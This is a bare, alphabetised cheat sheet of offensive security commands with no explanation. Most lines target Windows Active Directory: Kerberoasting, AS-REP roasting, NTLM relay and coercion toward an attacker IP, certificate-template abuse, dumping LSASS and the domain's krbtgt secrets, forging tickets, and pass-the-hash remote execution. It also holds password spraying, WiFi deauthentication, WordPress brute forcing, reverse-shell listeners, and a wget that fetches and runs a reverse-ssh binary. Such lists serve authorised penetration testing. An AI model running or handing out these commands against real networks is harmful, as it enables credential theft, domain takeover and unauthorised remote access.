./chisel server -p 8000 --reverse
./kerbrute userenum --dc $DC -d "$DOMAIN" user.txt
.\Certify.exe find /vulnerable
.\Certify.exe request /ca:dc.test.htb\test-DC-CA /template:UserAuthentication /altname:Administrator
FindUncommonShares.py -d "$DOMAIN" -u "$USER" -p "$PASSWORD" --dc-ip "$DC_IP"
GetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -dc-ip "$DC_IP" "$DOMAIN"/
GetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -dc-ip "$DC_IP" "$DOMAIN"/"$USER":"$PASSWORD"
GetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -hashes :a88baa3fdc8f581ee0fb05d7054d43e4 -dc-ip "$DC_IP" "$DOMAIN"/"$USER"
GetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -usersfile users.txt -dc-ip "$DC_IP" "$DOMAIN"/
GetUserSPNs.py -outputfile Kerberoastables.txt -dc-ip "$DC_IP" "$DOMAIN"/"$USER":"$PASSWORD"
GetUserSPNs.py -outputfile Kerberoastables.txt -hashes :a88baa3fdc8f581ee0fb05d7054d43e4 -dc-ip "$DC_IP" "$DOMAIN"/Administrator
GetUserSPNs.py -outputfile Kerberoastables.txt -no-preauth "$USER" -usersfile "services.txt" -dc-host "$DC_IP" "$DOMAIN"/
KRB5CCNAME="ticket.ccache" lsassy -k -d "$DOMAIN" -u "$USER" -K lsass_loot -o lsass_creds.txt "$TARGET"
KRB5CCNAME='DC01.ccache' getST.py -self -impersonate 'domainadmin' -k -no-pass -dc-ip dc01 "$DOMAIN"/"$DC_HOST"
KRB5CCNAME='domainadmin.ccache' secretsdump -just-dc-user 'krbtgt' -dc-ip dc01 -k -no-pass @"$DC_HOST"
KRB5CCNAME='sv01.ccache' getnthash.py -key '8eb7a6388780dd52eb358769dc53ff685fd135f89c4ef55abb277d7d98995f72' "$DOMAIN"/'sv01$'
addcomputer.py -computer-name 'SHUTDOWN$' -computer-pass '123soleil!' -dc-host DC01 -domain-netbios "$DOMAIN" "$DOMAIN"/"$USER":"$PASSWORD"
addspn.py -u "$DOMAIN"\\"$USER" -p "$PASSWORD" -t SV01 -s "HTTP/EXEGOL-01.$DOMAIN" --additional "$DC_HOST"
addspn.py -u "$DOMAIN"\\'SV01$' -p "ffffffffffffffffffffffffffffffff":"$NT_HASH" -s "HOST/EXEGOL-01.$DOMAIN" --additional "$DC_HOST"
aireplay-ng --deauth 10 -a TR:GT:AP:BS:SS:ID wlan1
airmon-ng start wlan1
airodump-ng -c 1 wlan1
airodump-ng wlan1
amap -d 192.168.10.10 4455
assetfinder google.com
atexec.py -hashes :"$NT_HASH" "$DOMAIN"/"$USER"@"$TARGET"
bloodhound-import -du neo4j -dp exegol4thewin *.json
bloodhound-quickwin -u neo4j -p exegol4thewin
bloodhound.py --zip -c All -d "$DOMAIN" -u "$USER" --hashes 'ffffffffffffffffffffffffffffffff':"$NT_HASH" -dc "$DC_HOST"
bloodhound.py --zip -c All -d "$DOMAIN" -u "$USER" -p "$PASSWORD" -dc "$DC_HOST"
cat 20220426210232_users.json | jq '.data[].Properties'
cat mailroom-ffuf.json| jq '.results[]|select(.status == '200')' | jq -c '{url:.url,length:.length}' | sort -u -t, -k2 | awk -F '"' '{print $4}' > 200.txt
cat mailroom-ffuf.json| jq '.results[]|select(.status == '403')' | jq -c '{url:.url,length:.length}' | sort -u -t, -k2 | awk -F '"' '{print $4}' > 200.txt
cat mailroom-ffuf.json| jq '.results[]|select(.status == '404')' | jq -c '{url:.url,length:.length}' | sort -u -t, -k2 | awk -F '"' '{print $4}' > 200.txt
cat mailroom-ffuf.json| jq '.results[]|select(.status == '500')' | jq -c '{url:.url,length:.length}' | sort -u -t, -k2 | awk -F '"' '{print $4}' > 200.txt
certipy auth -pfx "cert.pfx" -username administrator -domain $DOMAIN -dc-ip $IP
certipy find -u "$USER@$DOMAIN" -p "$PASSWORD" -old-bloodhound
cewl --depth 10 --with-numbers --write cewl.txt 192.168.10.10
cloudfail.py --target seo.com --tor
cloudscrap -u $URL -p 3 -d 3
clusterd -i "http://$TARGET/"
cme ldap "$DC_HOST" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" -M maq
cme ldap "$TARGET" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" --asreproast ASREProastables.txt --kdcHost "$DC_HOST"
cme ldap "$TARGET" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" --kerberoasting Kerberoastables.txt --kdcHost "$DC_HOST"
cme mssql $IP -u user.txt -p pass.txt
cme smb "$TARGET" --continue-on-success --no-bruteforce -u users.txt -p passwords.txt
cme smb "$TARGET" --continue-on-success -u users.txt -p passwords.txt
cme smb "$TARGET" --local-auth -u "$USER" -H "$NT_HASH" -M enum_avproducts
cme smb "$TARGET" --local-auth -u "$USER" -H "$NT_HASH" -M mimikatz
cme smb "$TARGET" -u '' -p '' --pass-pol
cme smb $IP -u $USER -p $PASSWORD 
cme smb $IP -u 'guest' -p '' --rid-brute
cme smb --list-modules
cme smb 192.168.56.0/24 --gen-relay-list smb_targets.txt
cme smb 192.168.56.0/24 --local-auth -u '' -p ''
cme smb 192.168.56.0/24 -u "$USER" -p "$PASSWORD" --loggedon-users
cme smb 192.168.56.0/24 -u "$USER" -p "$PASSWORD" --sessions
cme smb 192.168.56.0/24 -u "$USER" -p "$PASSWORD" --shares
cme smb 192.168.56.0/24 -u '' -p '' --shares
cme winrm $IP -u $USER -p $PASSWORD -x 'whoami'
cmsmap -F -d "http://$TARGET/"
coercer -d "$DOMAIN" -u "$USER" -p "$PASSWORD" --listener "$ATTACKER_IP" --target "$DC_HOST"
coercer -d "$DOMAIN" -u "$USER" -p "$PASSWORD" --webdav-host 'machine_name' --target "$DC_HOST"
crackhound.py --verbose --password 'exegol4thewin' --plain-text --plain-text --domain "$DOMAIN" --file ownedusers.txt --add-password
curl --ntlm -u "$USER":"$PASSWORD" 127.0.0.1
curl -# -l $URL
dcomexec.py -hashes :"$NT_HASH" "$DOMAIN"/"$USER"@"$TARGET"
dfscoerce.py -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$ATTACKER_IP" "$DC_HOST"
dirb http://192.168.10.10 /usr/share/seclists/Discovery/Web-Content/big.txt
dirsearch -r -w /usr/share/wordlists/seclists/Discovery/Web-Content/quickhits.txt -u "http://$TARGET/"
dnstool.py -u "$DOMAIN"\\"$USER" -p "$PASSWORD" --record '*' --action add --data "$ATTACKER_IP" "$DC_HOST"
dnstool.py -u "$DOMAIN"\\"$USER" -p "$PASSWORD" --record '*' --action query "$DC_HOST"
dnstool.py -u "$DOMAIN"\\"$USER" -p "$PASSWORD" -r "EXEGOL-01.$DOMAIN" -d "$ATTACKER_IP" --action add "$DC_HOST"
dnstool.py -u "$DOMAIN"\\"$USER" -p "$PASSWORD" -r "EXEGOL-01.$DOMAIN" -d 192.168.56.1 --action query "$DC_HOST"
dnstool.py -u "$DOMAIN"\\'SV01$' -p "ffffffffffffffffffffffffffffffff":"$NT_HASH" -r "EXEGOL-01.$DOMAIN" -d "$ATTACKER_IP" --action add "$DC_HOST"
echo "http://$TARGET/" | hakrawler -d 10
enum4linux -A "$IP"
enum4linux-ng -A "$TARGET"
enum4linux-ng -A -u "$DOMAIN"/"$USER" -p "$PASSWORD" "$DC_HOST"
evil-winrm -u "$USER" -H "$NT_HASH" -i "$TARGET"
evil-winrm -u "$USER" -i "$IP"
evil-winrm -u "$USER" -p "$PASSWORD" -i "$TARGET"
export AGENT='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36'
export DOMAIN=
export IP=
export KRB5CCNAME=randomuser.ccache
export NAME=
export TARGET=
export USER=
fcrackzip -u -v -D -p /usr/share/wordlists/rockyou.txt file.zip
ffuf -c -t 5 -rate 20 -p 0.2 -H "User-Agent: $AGENT" -ac -o $NAME.json -of json -mc 200,302,422,403 -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://$DOMAIN/FUZZ
ffuf -c -t 5 -rate 30 -p 0.2 -H "User-Agent: $AGENT" -r -ac -o $NAME.json -of json -mc 200,302,403 -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -u http://$DOMAIN/FUZZ
ffuf -c -t 5 -rate 30 -p 0.2 -H "User-Agent: $AGENT" -o $NAME_domains.json -of json -H "Host:FUZZ.$DOMAIN" -mc 200,403 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://$DOMAIN/
ffuf -request REQUESTFILE -request-proto http -w PATH/TO/WORDLIST -fs 0 -c
find DIR -type f -newermt YYYY-MM-DD ! -newermt YYYY-MM-DD > /dev/null
gMSADumper.py -d "$DOMAIN" -l "$DC_HOST" -u "$USER" -p "$PASSWORD"
getST.py -k -no-pass -spn host/"$DC_HOST" "$DOMAIN"/"$USER"
getST.py -spn "host/$TARGET" -impersonate 'domainadmin' -dc-ip "$DC_IP" "$DOMAIN"/'EXEGOL-01$':'exegol4thewin'
getST.py -spn CIFS/"$TARGET" -impersonate Administrator -dc-ip "$DC_IP" "$DOMAIN"/"$USER":"$PASSWORD"
getTGT.py -dc-ip dc01 "$DOMAIN"/'DC01':'123pentest'
gettgtpkinit.py -cert-pfx 'sv01.pfx' -pfx-pass 'RLLXdD5FhNPRphSqKGg8' "$DOMAIN"/'sv01$' 'sv01.ccache'
gobuster dir -w `fzf-wordlists` -t 20 -x php,txt,pl,sh,asp,aspx,html,json,py,cfm,rb,cgi,bak,tar.gz,tgz,zip -u "http://$TARGET/"
gobuster dir -w `fzf-wordlists` -u http://192.168.56.0:8000/
goldencopy --tools all --password 'exegol4thewin' --stealth --krbtgt 060ee2d06c5648e60a9ed916c9221ad19d90e5fb7b1cccf9d51f540fe991ada1 'john'
gosecretsdump -ntds ntds.dit.save -system system.save
h8mail -t test@gmail.com
hashcat --hash-type 1000 --potfile-path "$DOMAIN".ntds.cracked "$DOMAIN".ntds --show --username
hashcat --hash-type 16800 --attack-mode 0 dump_WPA-PMKID-PBKDF2.hashcat `fzf-wordlists`
hashcat --hash-type 22000 --attack-mode 0 dump_WPA-PBKDF2-PMKID_EAPOL.hashcat `fzf-wordlists`
hashcat --status --hash-type 1000 --attack-mode 0 --username "$DOMAIN".ntds `fzf-wordlists`
hashcat --status --hash-type 13100 --attack-mode 0 Kerberoastables.txt `fzf-wordlists`
hashcat --status --hash-type 18200 --attack-mode 0 ASREProastables.txt `fzf-wordlists`
hashcat --status --hash-type 2100 --attack-mode 0 '$DCC2$10240#user#bb38628253e7681553b72e7da3adf305' `fzf-wordlists`
hashcat --username --hash-type 0 --attack-mode 0 MD5_hashes.txt `fzf-wordlists`
hashcat -m 0 hash.txt rockyou.txt
httpx -probe -list hosts.txt -tech-detect -status-code -fr
impacket-mssqlclient $DOMAIN/$USER@$IP
impacket-smbclient $DOMAIN@$IP
ipinfo 1.1.1.1
john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt --fork=10 HashToPwn.txt --rules=all
john --format=krb5tgs --wordlist=`fzf-wordlists` Kerberoastables.txt
john --wordlist=`fzf-wordlists` ASREProastables.txt
kerbrute bruteuser -d "$DOMAIN" passwords.lst thoffman
kerbrute passwordspray -d "$DOMAIN" domain_users.txt Password123
kerbrute userenum -d "$DOMAIN" usernames.txt
krbrelayx.py --krbpass "$PASSWORD" --krbsalt DOMAIN.LOCALSV01 -t ldap://"$DC_HOST" --escalate-user "$USER"
krbrelayx.py -aesKey "9ff86898afa70f5f7b9f2bf16320cb38edb2639409e1bc441ac417fac1fed5ab"
ldapdomaindump --user "$DOMAIN"\\"$USER" --password "$PASSWORD" --outdir ldapdomaindump "$DC_HOST"
ldapsearch -H ldap://$IP/ -x -s base -b '' "(objectClass=*)" "*" +
ldapsearch -x -l "$DC_HOST" -D '' -w '' -b 'dc=DOMAIN,dc=LOCAL'
ldapsearch-ad --server "$DC_HOST" --domain "$DOMAIN" --username "$USER" --password "$PASSWORD" --type all
ldapsearch-ad --server "$DC_HOST" --type info
lnk-generate.py --host "$ATTACKER_IP" --type ntlm --output '@SHUTDOWN-LNK.lnk'
logfile $TARGET
lookupsid.py -hashes :"$NT_HASH" "$DOMAIN"/Administrator@"$DC_HOST" 0
lsassy -v -d "$DOMAIN" -u "$USER" -p "$PASSWORD" -K lsass_loot -o lsass_creds.txt 192.168.56.0/24
lsassy -v -u "$USER" -H "$NT_HASH" -K lsass_loot -o lsass_creds.txt 192.168.56.0/24
maigret "username"
masscan -v -p 1-65535 --rate=10000 -e eth0 192.168.56.0/24
masscan -v -p 1-65535,U:1-65535 --rate=10000 -e eth0 192.168.56.0/24
mitm6 --interface eth0
mitm6 --interface eth0 --domain "$DOMAIN"
mkdir -p test/{recon,exploit,report}
moodlescan -r -u "http://$TARGET/"
mount -o domain="$DOMAIN" -o username="$USER" -o password="$PASSWORD" -t cifs "//$DC_HOST/SYSVOL" /tmp/mnttarget/
ms14-068.py -u "$USER"@"$DOMAIN" --rc4 "$NT_HASH" -s "$DOMAIN_SID" -d "$DC_HOST"
mysql $IP -u $USER -p
nbtscan -r 192.168.56.0/24
nc -nvlp
neo4j start
neo4j stop
netdiscover -i INTERFACE_NAME -r IP_RANGE/CIDR -p
nfc-list
nfc-scan-device -v
ngrok authtoken AUTHTOKEN:::https://dashboard.ngrok.com/get-started/your-authtoken
nmap --script 'smb-enum*' --script-args unsafe=1 -T5 192.168.10.10
nmap --script broadcast-dhcp-discover
nmap --script http-ntlm-info --script-args http-ntlm-info.root=/ews/ -p 443 mx.example.com
nmap --script smb-enum-shares -p 139,445 -T4 -Pn 192.168.10.10
nmap --script=ldap-search -p 389 192.168.10.10
nmap -p 5900 --script=realvnc-auth-bypass 192.168.10.10
nmap -sC -sV -oA $NAME-nmap/$NAME -p- $IP
nmap -sS -n --open -p 88 192.168.56.0/24
nmblookup -A 192.168.10.10
nslookup -type=srv _gc._tcp."$DOMAIN"
nslookup -type=srv _kerberos._tcp."$DOMAIN"
nslookup -type=srv _kpasswd._tcp."$DOMAIN"
nslookup -type=srv _ldap._tcp."$DOMAIN"
nslookup -type=srv _ldap._tcp.dc._msdcs."$DOMAIN"
nslookup _ldap._tcp.dc._msdcs."$DOMAIN"
ntlm-scanner -vuln CVE-2019-1019 -target "$DOMAIN"/"$USER":"$PASSWORD"@"$DC_HOST"
ntlm-scanner -vuln CVE-2019-1040 -target "$DOMAIN"/"$USER":"$PASSWORD"@"$DC_HOST"
ntlm-scanner -vuln CVE-2019-1166 -target "$DOMAIN"/"$USER":"$PASSWORD"@"$DC_HOST"
ntlm-scanner -vuln CVE-2019-1338 -target "$DOMAIN"/"$USER":"$PASSWORD"@"$DC_HOST"
ntlmrelayx -t "http://pki.$DOMAIN/certsrv/certfnsh.asp" --adcs
ntlmrelayx -t dcsync://"$DC_HOST" -smb2support
ntlmrelayx -t ldap://"$DC_HOST" -smb2support --escalate-user 'EXEGOL-01$'
ntlmrelayx -t ldap://"$DC_HOST" -smb2support --interactive
ntlmrelayx -t ldap://"$DC_HOST" -smb2support --remove-mic --shadow-credentials --shadow-target 'dc01$'
ntlmrelayx -t ldaps://"$DC_HOST" -smb2support --add-computer 'EXEGOL-01' 'exegol4thewin' --delegate-access
ntlmrelayx -t ldaps://"$DC_HOST" -smb2support --remove-mic --add-computer 'EXEGOL-01' 'exegol4thewin' --delegate-access
ntlmrelayx -tf targets.txt -w -6 -smb2support -socks
ntpdate -u "$TARGET"
onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt 192.168.10.10
onesixtyone 192.168.10.10 manager
onesixtyone 192.168.10.10 private
onesixtyone 192.168.10.10 public
onionsearch 'computer'
onionsearch 'computer' --engines tor66 deeplink phobos --limit 3
openssl req -newkey rsa:2048 -nodes -keyout ignite.key -x509 -days 1000 -subj '/CN=blog.r0land.link/O=f0zy./C=IN' -out ignite.crt
openssl pkcs12 -in cert.pem -inkey priv.key -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
petitpotam.py "$ATTACKER_IP" "$DC_HOST"
petitpotam.py -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$ATTACKER_IP" "$DC_HOST"
polenum -u "$USER" -p "$PASSWORD" -d "$DC_HOST"
portscan
privexchange.py -u "$USER" -p "$PASSWORD" -ah "EXEGOL-01.$DOMAIN" EXCHANGE."$DOMAIN" -d "$DOMAIN"
proxychains atexec.py -no-pass "$DOMAIN"/"$USER"@"$TARGET"
proxychains dcomexec.py -no-pass "$DOMAIN"/"$USER"@"$TARGET"
proxychains lsassy -d "$DOMAIN" -u "$USER" -p "$PASSWORD" -K lsass_loot -o lsass_creds.txt "$TARGET"
proxychains psexec.py -no-pass "$DOMAIN"/"$USER"@"$TARGET"
proxychains secretsdump -no-pass "$DOMAIN"/"$USER"@"$TARGET"
proxychains smbexec.py -no-pass "$DOMAIN"/"$USER"@"$TARGET"
proxychains wmiexec.py -no-pass "$DOMAIN"/"$USER"@"$TARGET"
ps-shell
psexec.py -hashes :"$NT_HASH" "$DOMAIN"/"$USER"@"$TARGET"
pyLAPS.py --action get -d "$DOMAIN" -u "$USER" -p "$PASSWORD" --dc-ip "$DC_IP"
pypykatz kerberos tgt "kerberos+rc4://$DOMAIN\\$USER:$NT_HASH@$DOMAIN"
pypykatz lsa minidump lsass.dmp
python3 snmp-brute.py -t IP -f WORDLIST
pywhisker.py -v -d "$DOMAIN" -u "$USER" -H "$NT_HASH" -t 'sv01$' -a 'add'
renameMachine.py -current-name 'DC01' -new-name 'testcomputer$' -dc-ip dc01 "$DOMAIN"/"$USER":"$PASSWORD"
renameMachine.py -current-name 'testcomputer$' -new-name 'DC01' -dc-ip dc01 "$DOMAIN"/"$USER":"$PASSWORD"
responder --interface eth0 --analyze --disable-ess
responder --interface eth0 --analyze --lm --disable-ess
responder --interface eth0 --wpad --lm --ProxyAuth --disable-ess
responder --interface eth0 --wpad --lm --disable-ess
responder-http-off
responder-http-on
responder-smb-off
responder-smb-on
rlwrap -cAr nc -lvnp $PORT
rlwrap nc -lvnp 1337
rlwrap nc -nvlp $PORT
rpcclient -U "$DOMAIN"/"$USER" "$TARGET"
rpcclient -U '' -N "$DC_HOST"
rpcdump.py "$DC_HOST" | grep -A 6 MS-RPRN
scp chisel -i id_rsa $USER@$DOMAIN:/dev/shm/chisel
scp pspy64 -i id_rsa $USER@$DOMAIN:/dev/shm/psi
secretsdump
secretsdump -hashes :"$NT_HASH" "$DOMAIN"/"$USER"@"$DC_HOST"
secretsdump -just-dc-user krbtgt -hashes :"$NT_HASH" "$DOMAIN"/"$USER"@"$DC_HOST"
secretsdump -k "$TARGET"
secretsdump -k -outputfile "$DOMAIN" "$DC_HOST"
secretsdump -ldapfilter '(&(objectCategory=person)(objectClass=user)(!userAccountControl:1.2.840.113556.1.4.803:=2))' -just-dc -hashes :"$NT_HASH" "$DOMAIN"/"$USER"@"$DC_HOST"
secretsdump -ldapfilter '(&(objectClass=user)(adminCount=1))' -just-dc -hashes :a88baa3fdc8f581ee0fb05d7054d43e4 "$DOMAIN"/Administrator@"$DC_HOST"
secretsdump -no-pass "$DOMAIN"/'DC01$'@"$DC_HOST"
secretsdump -ntds ntds.dit.save -system system.save LOCAL
secretsdump -outputfile "$DOMAIN" -just-dc -hashes :"$NT_HASH" "$DOMAIN"/"$USER"@"$DC_HOST"
secretsdump -sam SAM.save -system SYSTEM.save -security SECURITY.save LOCAL
smbclient --list 192.168.10.10
smbclient --no-pass --user '' --list 192.168.10.10
smbclient --no-pass --user '' //192.168.10.10/SYSVOL
smbclient --user '' -L \\$IP\\\\
smbclient -U '' //$IP/
smbclient.py "$DOMAIN"/user:astrongpassword@192.168.56.201
smbexec.py -hashes :"$NT_HASH" "$DOMAIN"/"$USER"@"$TARGET"
smbexec.py -share 'ADMIN$' -k "$TARGET"
smbmap -H 192.168.10.10
smbmap -H 192.168.10.10 -R
smbmap -H 192.168.10.10 -R test
smbmap -u guest -H 192.168.10.10
smbserver.py -smb2support SHUTDOWN .
smtp-user-enum -M EXPN -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -t 192.168.10.10
smtp-user-enum -M RCPT -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -t 192.168.10.10
smtp-user-enum -M VRFY -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -t 192.168.10.10
snmpwalk -c public -v 1 192.168.10.10
snmpwalk -c public -v 2c 192.168.10.10
snmpwalk -v2c -c COMMUNITYSTRING IP
sprayhound -d "$DOMAIN" -dc "$DC_HOST" -nu 'neo4j' -np 'exegol4thewin' -lu "$USER" -lp "$PASSWORD"
sprayhound -d "$DOMAIN" -dc "$DC_HOST" -nu 'neo4j' -np 'exegol4thewin' -lu "$USER" -lp "$PASSWORD" -p 'somepassword'
sqlmap -r request.req --risk=3 --level=5 --dbms
sqlmap -u "http://localhost:8081/?id=" --risk 3 --level 5
ssh $USER@$DOMAIN 
ssh $USER@$IP
ssh-keygen -t rsa -b 4096 -f keyname
stat FILE
subfinder -d freelancer.com
subjack -w subdomains.txt -t 100 -timeout 30 -o results.txt -ssl
sublist3r -v -d "$DOMAIN"
sudo impacket-smbserver share . -smb2support
sudo nmap -sU --min-rate 10000 --reason IP
sudo nmap -sU --min-rate 10000 -oA nmap/udp $IP -v
sudo nmap -sU --top-ports 10 IP -v
sudo tcpdump -v -w capture.cap
theHarvester -d github.com -b all
theHarvester.py -d "$DOMAIN" -g -s -r -f "$DOMAIN.xml" -b all
ticketer.py -nthash "$NT_HASH" -domain-sid S-1-5-11-39129514-1145628974-103568174 -domain "$DOMAIN" randomuser
ticketer.py -nthash "$NT_HASH" -spn HOST/"$TARGET" -domain-sid "$DOMAIN_SID" -domain "$DOMAIN" randomuser
tiktok-scraper user USERNAME -d -n 100
tls-scanner -connect "$TARGET":443
toutatis.py -s SESSIONID -u starbucks
turbo -d $DOMAIN -t 5
waybackurls $URL
wget -r --no-parent --reject "index.html*" $ADDRESS
wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh
wget http://IP:PORT/reverse-ssh
whatweb -a 1 -U=$AGENT -t 10 --wait=0.2 http://$IP/
whatweb http://$IP/
whatweb https://$IP/
windapsearch --dc "$DC_HOST" --module metadata
windapsearch --dc "$DC_HOST" --module users
wmiexec.py -codec cp850 -hashes :"$NT_HASH" "$DOMAIN"/"$USER"@"$TARGET"
wmiexec.py -hashes :"$NT_HASH" "$DOMAIN"/"$USER"@"$TARGET"
wmiexec.py -k "$TARGET"
wpscan --api-token APITOKEN --url "http://$TARGET/" --no-banner --enumerate u1-20
wpscan --api-token APITOKEN --url "http://$TARGET/" --no-banner --plugins-detection aggressive
wpscan --api-token APITOKEN --url "http://$TARGET/" --no-banner --plugins-version-detection passive --password-attack xmlrpc -U 'admin' -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt
xfreerdp /d:"$DOMAIN" /u:"$USER" /pth:"$NT_HASH" /v:"$TARGET" /cert-ignore
zerologon-restore "$DOMAIN"/dc01@"$DC_HOST" -target-ip "$TARGET" -hexpass "69762...6945d"
zerologon-scan DC01 "$DC_HOST"
